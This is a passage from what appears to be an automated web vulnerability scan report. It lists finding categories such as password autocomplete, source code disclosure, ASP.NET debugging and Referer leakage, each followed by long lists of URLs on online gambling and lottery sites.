12.2. http://blog.primescratchcards.co.uk/

12.3. http://br.winnings.com/

12.4. http://casino.bet365.com/en/

12.5. http://casino.bet365.com/extra/en/online-games/baccarat

12.6. http://casino.bet365.com/extra/en/online-games/blackjack

12.7. http://casino.bet365.com/extra/en/online-games/live-dealer

12.8. http://casino.bet365.com/extra/en/online-games/roulette

12.9. http://casino.bet365.com/home/en/

12.10. http://da.crazyscratch.com/

12.11. http://da.winnings.com/

12.12. http://de.crazyscratch.com/

12.13. http://de.winnings.com/

12.14. http://el.crazyscratch.com/

12.15. http://el.winnings.com/

12.16. http://en.crazyscratch.com/

12.17. http://es.crazyscratch.com/

12.18. http://es.winnings.com/

12.19. http://fi.crazyscratch.com/

12.20. http://fi.winnings.com/

12.21. http://fr.crazyscratch.com/

12.22. http://fr.winnings.com/

12.23. http://games.bet365.com/en/scratchcards/

12.24. http://games.bet365.com/home/en/

12.25. http://getclicky.com/66384109

12.26. https://help.betsson.com/display/4/kb/faq/index.aspx

12.27. http://hu.crazyscratch.com/

12.28. http://it.crazyscratch.com/

12.29. http://mad4milk.net/

12.30. https://members.bet365.com/members/chat/

12.31. http://nl.crazyscratch.com/

12.32. http://nl.winnings.com/

12.33. http://no.crazyscratch.com/

12.34. http://no.winnings.com/

12.35. http://poker.bet365.com/en/

12.36. http://poker.bet365.com/home/en/

12.37. http://primescratchcards.com/images/bg.jpg

12.38. http://pt.crazyscratch.com/

12.39. http://pt.winnings.com/

12.40. http://scratch.co.uk/

12.41. http://scratch.co.uk/promotions/argos/

12.42. http://solutions.liveperson.com/ref/lppb.asp

12.43. http://sv.crazyscratch.com/

12.44. http://sv.winnings.com/

12.45. http://trk.primescratchcards.com/

12.46. http://winnings.com/xmlrpc.php

12.47. http://www.bet365.com/

12.48. http://www.bet365.com/bg/

12.49. http://www.bet365.com/cs/

12.50. http://www.bet365.com/da/

12.51. http://www.bet365.com/de/

12.52. http://www.bet365.com/el/

12.53. http://www.bet365.com/en/

12.54. http://www.bet365.com/en/default.asp

12.55. http://www.bet365.com/es/

12.56. http://www.bet365.com/home/iface.asp

12.57. http://www.bet365.com/hu/

12.58. http://www.bet365.com/it/

12.59. http://www.bet365.com/nn/

12.60. http://www.bet365.com/pl/

12.61. http://www.bet365.com/pt/

12.62. http://www.bet365.com/ro/

12.63. http://www.bet365.com/sk/

12.64. http://www.bet365.com/sv/

12.65. http://www.bet365.com/zh-CHS/

12.66. http://www.bet365.com/zh-CHT/

12.67. https://www.betsson.com/en/about/

12.68. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp

12.69. https://www.betsson.com/en/customer-service/

12.70. https://www.betsson.com/en/customer-service/forgotten-password/

12.71. https://www.betsson.com/en/customer-service/privacy-statement/

12.72. https://www.betsson.com/en/customer-service/responsible-gaming/

12.73. https://www.betsson.com/en/customer-service/terms/index.asp

12.74. https://www.betsson.com/en/my-account/refer-a-friend/index.asp

12.75. https://www.betsson.com/my-account/refer-a-friend/index.asp

12.76. http://www.crazyscratch.com/

12.77. http://www.egba.eu/

12.78. http://www.lga.org.mt/lga/content.aspx

12.79. http://www.lga.org.mt/lga/home.aspx

12.80. http://www.metacafe.com/fplayer/

12.81. http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl

12.82. http://www.opensource.org/licenses/mit-license.php

12.83. http://www.paysafecard.com/

12.84. http://www.primegaming.com/

12.85. http://www.primegrattage.com/

12.86. http://www.primescratchcards.com/

12.87. http://www.primescratchcards.com/index.asp

12.88. http://www.primescratchcards.com.br/

12.89. http://www.vincite.net/

12.90. http://www.winnings.com/

12.91. http://www.winnings.com/xmlrpc.php

12.92. http://ad.yieldmanager.com/imp

12.93. http://ad.yieldmanager.com/pixel

12.94. http://affiliates.interwetten.com/

12.95. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

12.96. http://b.scorecardresearch.com/b

12.97. http://bid.openx.net/json

12.98. http://br.bigmoneyscratch.com/Home.aspx

12.99. http://br.karamba.com/Home.aspx

12.100. http://d.tradex.openx.com/afr.php

12.101. http://d.tradex.openx.com/lg.php

12.102. http://da.bigmoneyscratch.com/Home.aspx

12.103. http://da.karamba.com/Home.aspx

12.104. http://da.scratch2cash.com/Home.aspx

12.105. http://da.scratchcardheaven.com/Home.aspx

12.106. http://de.bigmoneyscratch.com/Home.aspx

12.107. http://de.karamba.com/Home.aspx

12.108. http://de.scratch2cash.com/Home.aspx

12.109. http://de.scratchcardheaven.com/Home.aspx

12.110. http://el.karamba.com/Home.aspx

12.111. http://es.bigmoneyscratch.com/Home.aspx

12.112. http://es.karamba.com/Home.aspx

12.113. http://es.scratch2cash.com/Home.aspx

12.114. http://es.scratchcardheaven.com/Home.aspx

12.115. http://fi.bigmoneyscratch.com/Home.aspx

12.116. http://fi.karamba.com/Home.aspx

12.117. http://fi.scratchcardheaven.com/Home.aspx

12.118. http://fr.bigmoneyscratch.com/Home.aspx

12.119. http://fr.karamba.com/Home.aspx

12.120. http://fr.scratch2cash.com/Home.aspx

12.121. http://fr.scratchcardheaven.com/Home.aspx

12.122. http://home.okscratchcards.com/AboutUs.aspx

12.123. http://home.okscratchcards.com/ContactUsMail.aspx

12.124. http://home.okscratchcards.com/FairPlay.aspx

12.125. http://home.okscratchcards.com/PlayersClub.aspx

12.126. http://home.okscratchcards.com/Promotions.aspx

12.127. http://home.okscratchcards.com/Responsible.aspx

12.128. http://home.okscratchcards.com/SecurityAndPrivacy.aspx

12.129. http://home.okscratchcards.com/Terms.aspx

12.130. http://home.okscratchcards.com/help.aspx

12.131. http://home.okscratchcards.com/visit.aspx

12.132. http://it.bigmoneyscratch.com/Home.aspx

12.133. http://it.karamba.com/Home.aspx

12.134. http://it.scratch2cash.com/Home.aspx

12.135. http://it.scratchcardheaven.com/Home.aspx

12.136. http://m.xp1.ru4.com/ad

12.137. http://nettiarpa.com/

12.138. http://nl.bigmoneyscratch.com/Home.aspx

12.139. http://nl.karamba.com/Home.aspx

12.140. http://nl.scratch2cash.com/Home.aspx

12.141. http://nl.scratchcardheaven.com/Home.aspx

12.142. http://no.bigmoneyscratch.com/Home.aspx

12.143. http://no.karamba.com/Home.aspx

12.144. http://no.scratchcardheaven.com/Home.aspx

12.145. http://pixel.invitemedia.com/data_sync

12.146. http://pixel.quantserve.com/pixel

12.147. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif

12.148. http://primescratchcards.com/images/HelpDepositMethods.asp

12.149. http://primescratchcards.com/images/InviteFriend.asp

12.150. http://primescratchcards.com/images/Responsible.asp

12.151. http://primescratchcards.com/images/SecurityAndPrivacy.asp

12.152. http://primescratchcards.com/images/aboutus.asp

12.153. http://primescratchcards.com/images/affiliates.asp

12.154. http://primescratchcards.com/images/contactus.asp

12.155. http://primescratchcards.com/images/fairplay.asp

12.156. http://primescratchcards.com/images/help.asp

12.157. http://primescratchcards.com/images/index.asp

12.158. http://primescratchcards.com/images/media.asp

12.159. http://primescratchcards.com/images/playersclub.asp

12.160. http://primescratchcards.com/images/promotions.asp

12.161. http://primescratchcards.com/images/terms.asp

12.162. http://primescratchcards.com/images/underage.asp

12.163. http://pt.bigmoneyscratch.com/Home.aspx

12.164. http://pt.karamba.com/Home.aspx

12.165. http://pt.scratch2cash.com/Home.aspx

12.166. http://pt.scratchcardheaven.com/Home.aspx

12.167. http://scratch.co.uk/

12.168. http://scratch.co.uk/about/

12.169. http://scratch.co.uk/contact/

12.170. http://scratch.co.uk/help/

12.171. http://scratch.co.uk/help/deposit/methods/

12.172. http://scratch.co.uk/help/fairplay/

12.173. http://scratch.co.uk/help/privacy/

12.174. http://scratch.co.uk/invite-friend/

12.175. http://scratch.co.uk/over-18/

12.176. http://scratch.co.uk/problem-gambling/

12.177. http://scratch.co.uk/promotions/

12.178. http://scratch.co.uk/terms/

12.179. http://scratch.co.uk/vis-club/

12.180. http://scratch.co.uk/winners/

12.181. http://server.iad.liveperson.net/hc/15712222/

12.182. http://server.iad.liveperson.net/hc/15712222/

12.183. http://server.iad.liveperson.net/hc/15712222/

12.184. http://sv.bigmoneyscratch.com/Home.aspx

12.185. http://sv.karamba.com/Home.aspx

12.186. http://sv.scratch2cash.com/Home.aspx

12.187. http://sv.scratchcardheaven.com/Home.aspx

12.188. http://twitter.com/PostcodeLottery

12.189. http://twitter.com/PrimeScratch

12.190. http://twitter.com/crazyscratch

12.191. http://twitter.com/ukscratch

12.192. http://va.px.invitemedia.com/goog_imp

12.193. http://winter.metacafe.com/Openx/www/delivery/lg.php

12.194. http://www.bet365.com/extra/en/betting/in-play

12.195. http://www.bet365.com/extra/en/betting/live-streaming

12.196. http://www.bet365.com/extra/en/mobile/introduction/

12.197. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

12.198. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

12.199. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

12.200. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx

12.201. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

12.202. https://www.betsson.com/start/en/

12.203. https://www.betsson.com/start/is/

12.204. https://www.betsson.com/web/en/sportsbook/

12.205. http://www.bigmoneyscratch.com/

12.206. http://www.bigmoneyscratch.com/AboutUs.aspx

12.207. http://www.bigmoneyscratch.com/Affiliates.aspx

12.208. http://www.bigmoneyscratch.com/ContactUsChat.aspx

12.209. http://www.bigmoneyscratch.com/ContactUsFax.aspx

12.210. http://www.bigmoneyscratch.com/ContactUsMail.aspx

12.211. http://www.bigmoneyscratch.com/ContactUsTel.aspx

12.212. http://www.bigmoneyscratch.com/FAQ.aspx

12.213. http://www.bigmoneyscratch.com/FairPlay.aspx

12.214. http://www.bigmoneyscratch.com/Help.aspx

12.215. http://www.bigmoneyscratch.com/Home.aspx

12.216. http://www.bigmoneyscratch.com/InviteFriend.aspx

12.217. http://www.bigmoneyscratch.com/Mobile.aspx

12.218. http://www.bigmoneyscratch.com/PlayersClub.aspx

12.219. http://www.bigmoneyscratch.com/Promotions.aspx

12.220. http://www.bigmoneyscratch.com/Responsible.aspx

12.221. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx

12.222. http://www.bigmoneyscratch.com/Terms.aspx

12.223. http://www.bigmoneyscratch.com/UnderAge.aspx

12.224. http://www.facebook.com/

12.225. http://www.facebook.com/PrimeScratchCards

12.226. http://www.facebook.com/WinningsCom

12.227. http://www.facebook.com/crazyscratch

12.228. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

12.229. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

12.230. http://www.facebook.com/peoplespostcodelottery

12.231. http://www.gambleaware.co.uk/

12.232. http://www.gamblersanonymous.org.uk/

12.233. http://www.hopa.com/

12.234. http://www.hopa.com/visit.aspx

12.235. http://www.info.crazyscratch.com/AboutUs.aspx

12.236. http://www.info.crazyscratch.com/ContactUsFax.aspx

12.237. http://www.info.crazyscratch.com/ContactUsMail.aspx

12.238. http://www.info.crazyscratch.com/ContactUsTel.aspx

12.239. http://www.info.crazyscratch.com/FairPlay.aspx

12.240. http://www.info.crazyscratch.com/Help.aspx

12.241. http://www.info.crazyscratch.com/InviteFriend.aspx

12.242. http://www.info.crazyscratch.com/PlayersClub.aspx

12.243. http://www.info.crazyscratch.com/Privacy.aspx

12.244. http://www.info.crazyscratch.com/Promotions.aspx

12.245. http://www.info.crazyscratch.com/Responsible.aspx

12.246. http://www.info.crazyscratch.com/Terms.aspx

12.247. http://www.info.crazyscratch.com/UnderAge.aspx

12.248. http://www.info.crazyscratch.com/visit.aspx

12.249. http://www.info.winnings.com/visit.aspx

12.250. https://www.interwetten.com/

12.251. http://www.karamba.com/

12.252. http://www.karamba.com/AboutUs.aspx

12.253. http://www.karamba.com/FairPlay.aspx

12.254. http://www.karamba.com/Help.aspx

12.255. http://www.karamba.com/Home.aspx

12.256. http://www.karamba.com/InviteFriend.aspx

12.257. http://www.karamba.com/PlayersClub.aspx

12.258. http://www.karamba.com/Privacy.aspx

12.259. http://www.karamba.com/Promotions.aspx

12.260. http://www.karamba.com/Responsible.aspx

12.261. http://www.karamba.com/Sitemap.aspx

12.262. http://www.karamba.com/Terms.aspx

12.263. http://www.karamba.com/UnderAge.aspx

12.264. http://www.karamba.com/click/Karamba.com/ENG/Home/

12.265. http://www.mundirasca.com/

12.266. http://www.mundirasca.com/AboutUs.aspx

12.267. http://www.mundirasca.com/ContactUsChat.aspx

12.268. http://www.mundirasca.com/ContactUsFax.aspx

12.269. http://www.mundirasca.com/ContactUsMail.aspx

12.270. http://www.mundirasca.com/ContactUsTel.aspx

12.271. http://www.mundirasca.com/FAQ.aspx

12.272. http://www.mundirasca.com/FairPlay.aspx

12.273. http://www.mundirasca.com/Help.aspx

12.274. http://www.mundirasca.com/Home.aspx

12.275. http://www.mundirasca.com/InviteFriend.aspx

12.276. http://www.mundirasca.com/PlayersClub.aspx

12.277. http://www.mundirasca.com/Promotions.aspx

12.278. http://www.mundirasca.com/Responsible.aspx

12.279. http://www.mundirasca.com/SecurityAndPrivacy.aspx

12.280. http://www.mundirasca.com/Terms.aspx

12.281. http://www.mundirasca.com/UnderAge.aspx

12.282. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/

12.283. http://www.neteller.com/

12.284. http://www.pclscratch.com/ContactUsMail.aspx

12.285. http://www.pclscratch.com/FairPlay.aspx

12.286. http://www.pclscratch.com/Promotions.aspx

12.287. http://www.pclscratch.com/Responsible.aspx

12.288. http://www.pclscratch.com/SecurityAndPrivacy.aspx

12.289. http://www.pclscratch.com/Terms.aspx

12.290. http://www.postcodelottery.com/AboutUs.htm

12.291. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

12.292. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

12.293. http://www.postcodelottery.com/Charities.htm

12.294. http://www.postcodelottery.com/DrawResults.htm

12.295. http://www.postcodelottery.com/FunGames.htm

12.296. http://www.postcodelottery.com/FunGames/FreeGames.htm

12.297. http://www.postcodelottery.com/FunGames/PaidGames.htm

12.298. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

12.299. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm

12.300. http://www.postcodelottery.com/Games/Scratchcards.htm

12.301. http://www.postcodelottery.com/Home.htm

12.302. http://www.postcodelottery.com/HowItWorks.htm

12.303. http://www.postcodelottery.com/MyAccount.htm

12.304. http://www.postcodelottery.com/RSS.htm

12.305. http://www.postcodelottery.com/Sitemap.htm

12.306. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

12.307. http://www.primescratchcards.com/HelpDepositMethods.asp

12.308. http://www.primescratchcards.com/InviteFriend.asp

12.309. http://www.primescratchcards.com/Responsible.asp

12.310. http://www.primescratchcards.com/SecurityAndPrivacy.asp

12.311. http://www.primescratchcards.com/aboutus.asp

12.312. http://www.primescratchcards.com/affiliates.asp

12.313. http://www.primescratchcards.com/contactus.asp

12.314. http://www.primescratchcards.com/fairplay.asp

12.315. http://www.primescratchcards.com/help.asp

12.316. http://www.primescratchcards.com/media.asp

12.317. http://www.primescratchcards.com/playersclub.asp

12.318. http://www.primescratchcards.com/promotions.asp

12.319. http://www.primescratchcards.com/terms.asp

12.320. http://www.primescratchcards.com/underage.asp

12.321. http://www.scratch2cash.com/

12.322. http://www.scratch2cash.com/AboutUs.aspx

12.323. http://www.scratch2cash.com/ContactUsMail.aspx

12.324. http://www.scratch2cash.com/FairPlay.aspx

12.325. http://www.scratch2cash.com/Help.aspx

12.326. http://www.scratch2cash.com/Home.aspx

12.327. http://www.scratch2cash.com/InviteFriend.aspx

12.328. http://www.scratch2cash.com/PlayersClub.aspx

12.329. http://www.scratch2cash.com/Promotions.aspx

12.330. http://www.scratch2cash.com/Responsible.aspx

12.331. http://www.scratch2cash.com/SecurityAndPrivacy.aspx

12.332. http://www.scratch2cash.com/Sitemap.aspx

12.333. http://www.scratch2cash.com/Terms.aspx

12.334. http://www.scratch2cash.com/UnderAge.aspx

12.335. http://www.scratchcardheaven.com/

12.336. http://www.scratchcardheaven.com/AboutUs.aspx

12.337. http://www.scratchcardheaven.com/ContactUsMail.aspx

12.338. http://www.scratchcardheaven.com/FairPlay.aspx

12.339. http://www.scratchcardheaven.com/Help.aspx

12.340. http://www.scratchcardheaven.com/Home.aspx

12.341. http://www.scratchcardheaven.com/InviteFriend.aspx

12.342. http://www.scratchcardheaven.com/PlayersClub.aspx

12.343. http://www.scratchcardheaven.com/Promotions.aspx

12.344. http://www.scratchcardheaven.com/Responsible.aspx

12.345. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx

12.346. http://www.scratchcardheaven.com/Terms.aspx

12.347. http://www.scratchcardheaven.com/UnderAge.aspx

12.348. http://www.svenskalotter.com/

12.349. http://www.svenskalotter.com/AboutUs.aspx

12.350. http://www.svenskalotter.com/Affiliates.aspx

12.351. http://www.svenskalotter.com/Charity.aspx

12.352. http://www.svenskalotter.com/ContactUsMail.aspx

12.353. http://www.svenskalotter.com/FairPlay.aspx

12.354. http://www.svenskalotter.com/Help.aspx

12.355. http://www.svenskalotter.com/Home.aspx

12.356. http://www.svenskalotter.com/InviteFriend.aspx

12.357. http://www.svenskalotter.com/PlayersClub.aspx

12.358. http://www.svenskalotter.com/Promotions.aspx

12.359. http://www.svenskalotter.com/Responsible.aspx

12.360. http://www.svenskalotter.com/SecurityAndPrivacy.aspx

12.361. http://www.svenskalotter.com/Terms.aspx

12.362. http://www.svenskalotter.com/UnderAge.aspx

12.363. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/

12.364. http://www.thawte.com/

12.365. https://www.thawte.com/

12.366. http://www.verisign.co.uk/

12.367. http://www.visa.co.uk/

12.368. http://www.winnings.com/comments/feed

12.369. http://www.winnings.com/feed

12.370. http://www.winnings.com/how-to-win-money

12.371. http://www.winnings.com/instant-games

12.372. http://www.winnings.com/lottery-scratch-cards

12.373. http://www.winnings.com/scratch-cards

12.374. http://www.winnings.com/site-map

12.375. http://www.winnings.com/slots

12.376. http://www.winnings.com/wp-admin/admin-ajax.php

12.377. http://www.youtube.com/user/CrazyScratchCom

12.378. http://www.youtube.com/user/PostcodeLottery

12.379. http://www.youtube.com/user/primescratchcards1

12.380. http://www.youtube.com/v/

13. Password field with autocomplete enabled

13.1. http://affiliates.interwetten.com/

13.2. http://bingo.bet365.com/play/en/home/

13.3. https://bingo.betsson.com/en/

13.4. http://casino.bet365.com/extra/en/online-games/baccarat

13.5. http://casino.bet365.com/extra/en/online-games/blackjack

13.6. http://casino.bet365.com/extra/en/online-games/live-dealer

13.7. http://casino.bet365.com/extra/en/online-games/roulette

13.8. http://casino.bet365.com/home/en/

13.9. https://casino.betsson.com/en/

13.10. http://games.bet365.com/home/en/

13.11. https://games.betsson.com/en/

13.12. https://livecasino.betsson.com/en/

13.13. http://poker.bet365.com/home/en/

13.14. https://poker.betsson.com/en/

13.15. https://scratch.betsson.com/en/

13.16. https://scratch.betsson.com/en/

13.17. https://scratch.betsson.com/en/Casino

13.18. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

13.19. https://scratch.betsson.com/en/Casino/Bubble-Bingo

13.20. https://scratch.betsson.com/en/Casino/Disco-Keno

13.21. https://scratch.betsson.com/en/Casino/HiLo

13.22. https://scratch.betsson.com/en/Casino/Lucky-21

13.23. https://scratch.betsson.com/en/Casino/Namaste

13.24. https://scratch.betsson.com/en/Casino/Poker-King

13.25. https://scratch.betsson.com/en/Casino/Roulette

13.26. https://scratch.betsson.com/en/Casino/Royal-Slots

13.27. https://scratch.betsson.com/en/Casino/Slot-Super-7

13.28. https://scratch.betsson.com/en/Classic

13.29. https://scratch.betsson.com/en/Classic/3-Wow

13.30. https://scratch.betsson.com/en/Classic/7th-Heaven

13.31. https://scratch.betsson.com/en/Classic/Champagne

13.32. https://scratch.betsson.com/en/Classic/Golden-Fortune

13.33. https://scratch.betsson.com/en/Classic/Happy-Birthday

13.34. https://scratch.betsson.com/en/Classic/Jungle-Joy

13.35. https://scratch.betsson.com/en/Classic/Neighbors

13.36. https://scratch.betsson.com/en/Classic/Spy-Comics

13.37. https://scratch.betsson.com/en/Classic/Super-3-Wow

13.38. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

13.39. https://scratch.betsson.com/en/Classic/Wild-West

13.40. https://scratch.betsson.com/en/Classic/XO

13.41. https://scratch.betsson.com/en/Default.aspx

13.42. https://scratch.betsson.com/en/FAQ

13.43. https://scratch.betsson.com/en/Fantasy

13.44. https://scratch.betsson.com/en/Fantasy/Cash-Farm

13.45. https://scratch.betsson.com/en/Fantasy/Club-Pearl

13.46. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

13.47. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

13.48. https://scratch.betsson.com/en/Fantasy/Fast-Hands

13.49. https://scratch.betsson.com/en/Fantasy/Golden-Island

13.50. https://scratch.betsson.com/en/Fantasy/Knights-Battle

13.51. https://scratch.betsson.com/en/Fantasy/Love-Birds

13.52. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

13.53. https://scratch.betsson.com/en/Fantasy/Master-Mix

13.54. https://scratch.betsson.com/en/Fantasy/Memory-Madness

13.55. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

13.56. https://scratch.betsson.com/en/Fantasy/Outer-Space

13.57. https://scratch.betsson.com/en/Fantasy/Super-Chance

13.58. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

13.59. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

13.60. https://scratch.betsson.com/en/Fantasy/Treasure-Island

13.61. https://scratch.betsson.com/en/Fantasy/Zodiac

13.62. https://scratch.betsson.com/en/GameHistory

13.63. https://scratch.betsson.com/en/Information

13.64. https://scratch.betsson.com/en/News

13.65. https://scratch.betsson.com/en/OurScratchcards

13.66. https://scratch.betsson.com/en/Ourwinners

13.67. https://scratch.betsson.com/en/Slots/5th-Avenue

13.68. https://scratch.betsson.com/en/Slots/Adventure-Jack

13.69. https://scratch.betsson.com/en/Slots/Atlantis

13.70. https://scratch.betsson.com/en/Slots/Bon-Apetit

13.71. https://scratch.betsson.com/en/Slots/Cafe-Paris

13.72. https://scratch.betsson.com/en/Slots/Castle-Slots

13.73. https://scratch.betsson.com/en/Slots/Chic-Boutique

13.74. https://scratch.betsson.com/en/Slots/Conga-Beat

13.75. https://scratch.betsson.com/en/Slots/Egyptian-Magic

13.76. https://scratch.betsson.com/en/Slots/Esmeralda

13.77. https://scratch.betsson.com/en/Slots/Fair-Play

13.78. https://scratch.betsson.com/en/Slots/Fantasia

13.79. https://scratch.betsson.com/en/Slots/Grand-Crown

13.80. https://scratch.betsson.com/en/Slots/Holiday-Hotel

13.81. https://scratch.betsson.com/en/Slots/Ice-Land

13.82. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

13.83. https://scratch.betsson.com/en/Slots/Monaco-Glamour

13.84. https://scratch.betsson.com/en/Slots/Monte-Carlo

13.85. https://scratch.betsson.com/en/Slots/Pirates-Paradise

13.86. https://scratch.betsson.com/en/Slots/Sakura-Garden

13.87. https://scratch.betsson.com/en/Slots/Sea-And-Sun

13.88. https://scratch.betsson.com/en/Slots/Sky-Of-Love

13.89. https://scratch.betsson.com/en/Slots/Triple-Carnival

13.90. https://scratch.betsson.com/en/Slots/Tropical-Fruit

13.91. https://scratch.betsson.com/en/Sports/100m-Champion

13.92. https://scratch.betsson.com/en/Sports/Bowling

13.93. https://scratch.betsson.com/en/Sports/Darts

13.94. https://scratch.betsson.com/en/Sports/Goal-Kick

13.95. https://scratch.betsson.com/en/Sports/Gone-Fishing

13.96. https://scratch.betsson.com/en/Sports/Hippodrome

13.97. https://scratch.betsson.com/en/Sports/Ready-Set-Go

13.98. https://scratch.betsson.com/en/Sports/Road-Racing

13.99. https://scratch.betsson.com/en/Sports/World-Champions

13.100. http://twitter.com/PostcodeLottery

13.101. http://twitter.com/PrimeScratch

13.102. http://twitter.com/crazyscratch

13.103. http://twitter.com/ukscratch

13.104. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.105. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.106. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.107. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

13.108. http://www.bet365.com/extra/en/betting/in-play

13.109. http://www.bet365.com/extra/en/betting/live-streaming

13.110. http://www.bet365.com/extra/en/mobile/introduction/

13.111. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

13.112. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

13.113. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

13.114. https://www.betsson.com/start/en/

13.115. https://www.betsson.com/start/is/

13.116. https://www.betsson.com/web/en/sportsbook/

13.117. http://www.crazyrewards.com/

13.118. http://www.facebook.com/

13.119. http://www.facebook.com/

13.120. http://www.facebook.com/

13.121. http://www.facebook.com/PrimeScratchCards

13.122. http://www.facebook.com/WinningsCom

13.123. http://www.facebook.com/crazyscratch

13.124. http://www.facebook.com/peoplespostcodelottery

13.125. http://www.heavenaffiliates.com/

13.126. https://www.interwetten.com/Header-Contact

13.127. https://www.interwetten.com/Header-Help-FAQ

13.128. https://www.interwetten.com/Header-Menu-Casino

13.129. https://www.interwetten.com/Header-Menu-Home

13.130. https://www.interwetten.com/Header-Menu-Live

13.131. https://www.interwetten.com/Header-Menu-Sportsbook

13.132. https://www.interwetten.com/Header-Payment-possibilities

13.133. https://www.interwetten.com/Header-Tutorials

13.134. https://www.interwetten.com/ScriptResource.axd

13.135. https://www.interwetten.com/WebResource.axd

13.136. https://www.interwetten.com/en/Default.aspx

13.137. https://www.interwetten.com/en/american-football-betting

13.138. https://www.interwetten.com/en/australian-rules-football-betting

13.139. https://www.interwetten.com/en/beach-soccer-betting

13.140. https://www.interwetten.com/en/boxing-betting

13.141. https://www.interwetten.com/en/casino/default.aspx

13.142. https://www.interwetten.com/en/cycling-betting

13.143. https://www.interwetten.com/en/darts-betting

13.144. https://www.interwetten.com/en/default.aspx

13.145. https://www.interwetten.com/en/football-betting

13.146. https://www.interwetten.com/en/games/default.aspx

13.147. https://www.interwetten.com/en/golf-betting

13.148. https://www.interwetten.com/en/handball-betting

13.149. https://www.interwetten.com/en/ice-hockey-betting

13.150. https://www.interwetten.com/en/livebets

13.151. https://www.interwetten.com/en/motorbikes-betting

13.152. https://www.interwetten.com/en/online-skillgames

13.153. https://www.interwetten.com/en/politics-betting

13.154. https://www.interwetten.com/en/rugby-betting

13.155. https://www.interwetten.com/en/sailing-betting

13.156. https://www.interwetten.com/en/scratch/default.aspx

13.157. https://www.interwetten.com/en/ski-alpine-betting

13.158. https://www.interwetten.com/en/skill/default.aspx

13.159. https://www.interwetten.com/en/sportsbook/default.aspx

13.160. https://www.interwetten.com/en/tennis-betting

13.161. https://www.interwetten.com/en/volleyball-betting

13.162. https://www.interwetten.com/en/water-polo-betting

13.163. https://www.interwetten.com/en/winter-games-betting

13.164. http://www.postcodelottery.com/MyAccount.htm

13.165. http://www.tstglobal.com/

13.166. http://www.verisign.co.uk/

14. Source code disclosure

14.1. http://neogames-tech.com/

14.2. http://neogames-tech.com/careers

14.3. http://neogames-tech.com/contact-us

14.4. http://neogames-tech.com/corporate

14.5. http://neogames-tech.com/corporate/gaming-license

14.6. http://neogames-tech.com/products

14.7. http://www.neogames.com/

14.8. http://www.neogames.com/contact-us

14.9. http://www.neogames.com/corporate

14.10. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

14.11. http://www.neogames.com/news-and-events/neogames-launches-38-games-in-2010

14.12. http://www.neogames.com/our-partners

14.13. http://www.neogames.com/products

15. ASP.NET debugging enabled

15.1. http://affiliates.interwetten.com/Default.aspx

15.2. http://www.gamblingtherapy.org/Default.aspx

15.3. http://www.paypoint.co.uk/Default.aspx

16. Referer-dependent response

16.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

16.2. http://d.tradex.openx.com/afr.php

16.3. http://www.facebook.com/PrimeScratchCards

16.4. http://www.facebook.com/plugins/likebox.php

16.5. http://www.primescratchcards.com/index.asp

17. Cross-domain POST

17.1. http://leandrovieira.com/projects/jquery/lightbox/

17.2. http://www.huddletogether.com/projects/lightbox2/

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.2. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.3. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.4. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

18.5. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

18.6. http://ad.yieldmanager.com/imp

18.7. http://d.tradex.openx.com/afr.php

18.8. http://home.okscratchcards.com/Promotions.aspx

18.9. http://home.okscratchcards.com/visit.aspx

18.10. http://itunes.apple.com/us/app/pclottery/id399201446

18.11. http://primescratchcards.com/images/index.asp

18.12. https://scratch.betsson.com/en/

18.13. https://scratch.betsson.com/en/

18.14. http://scratch.co.uk/

18.15. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx

18.16. https://secure.neogames-tech.com/ScratchCards/js/LoadObjects.js

18.17. https://www.aspireaffiliates.com/

18.18. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

18.19. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

18.20. https://www.aspireaffiliates.com/marketing-samples/

18.21. https://www.aspireaffiliates.com/mobile/

18.22. http://www.bigmoneyscratch.com/Home.aspx

18.23. http://www.facebook.com/

18.24. http://www.facebook.com/WinningsCom

